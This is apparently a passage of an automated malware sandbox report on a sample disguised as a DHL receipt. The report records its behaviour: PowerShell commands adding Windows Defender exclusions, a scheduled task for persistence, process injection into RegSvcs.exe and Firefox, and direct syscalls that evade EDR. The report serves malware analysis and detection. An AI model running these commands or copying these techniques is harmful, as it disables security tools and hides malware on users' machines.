                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172CA24 mov eax, dword ptr fs:[00000030h]8_2_0172CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171EA2E mov eax, dword ptr fs:[00000030h]8_2_0171EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177CA11 mov eax, dword ptr fs:[00000030h]8_2_0177CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0AD0 mov eax, dword ptr fs:[00000030h]8_2_016F0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01746AA4 mov eax, dword ptr fs:[00000030h]8_2_01746AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728A90 mov edx, dword ptr fs:[00000030h]8_2_01728A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]8_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4A80 mov eax, dword ptr fs:[00000030h]8_2_017C4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01788D6B mov eax, dword ptr fs:[00000030h]8_2_01788D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0D59 mov eax, dword ptr fs:[00000030h]8_2_016F0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0D59 mov eax, dword ptr fs:[00000030h]8_2_016F0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0D59 mov eax, dword ptr fs:[00000030h]8_2_016F0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]8_2_016F8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]8_2_016F8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]8_2_016F8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]8_2_016F8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]8_2_016F8D59
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeNtCreateUserProcess: Direct from: 0x76F0371C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread register set: target process: 8136
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread APC queued: target process: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C8A008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1174008Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
